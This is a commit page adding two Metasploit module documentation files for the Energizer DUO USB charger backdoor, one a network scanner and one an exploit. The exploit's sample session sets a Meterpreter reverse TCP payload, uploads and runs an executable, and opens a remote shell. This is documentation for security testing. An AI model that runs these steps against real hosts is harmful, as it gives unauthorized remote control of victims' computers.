Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
2 changed files
with
63 additions
and
0 deletions.
There are no files selected for viewing
27 changes: 27 additions & 0 deletions
27
documentation/modules/auxiliary/scanner/backdoor/energizer_duo_detect.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
## Vulnerable Application | ||
|
||
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan). | ||
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777. | ||
|
||
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx). | ||
|
||
## Verification Steps | ||
|
||
1. Install the vulnerable software | ||
2. Start msfconsole | ||
3. Do: `use auxiliary/scanner/backdoor/energizer_duo_detect` | ||
4. Do: `set rhosts` | ||
5. Do: `run` | ||
|
||
## Scenarios | ||
|
||
A run against the backdoor | ||
|
||
``` | ||
msf > use auxiliary/scanner/backdoor/energizer_duo_detect | ||
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24 | ||
msf auxiliary(energizer_duo_detect) > set THREADS 256 | ||
msf auxiliary(energizer_duo_detect) > run | ||
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]... | ||
``` |
36 changes: 36 additions & 0 deletions
36
documentation/modules/exploit/windows/backdoor/energizer_duo_payload.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
## Vulnerable Application | ||
|
||
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan). | ||
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777. | ||
|
||
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx). | ||
|
||
## Verification Steps | ||
|
||
1. Install the vulnerable software | ||
2. Start msfconsole | ||
3. Do: `use exploit/windows/backdoor/energizer_duo_payload` | ||
4. Do: `set rhost` | ||
5. Do: `set payload` | ||
6. Do: `exploit` | ||
|
||
## Scenarios | ||
|
||
A run against the backdoor | ||
|
||
``` | ||
msf > use exploit/windows/backdoor/energizer_duo_payload | ||
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132 | ||
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp | ||
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228 | ||
msf exploit(energizer_duo_payload) > exploit | ||
[*] Started reverse handler on 192.168.0.228:4444 | ||
[*] Trying to upload C:\NTL0ZTL4DhVL.exe... | ||
[*] Trying to execute C:\NTL0ZTL4DhVL.exe... | ||
[*] Sending stage (747008 bytes) | ||
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200) | ||
meterpreter > getuid | ||
Server username: XPDEV\Developer | ||
``` |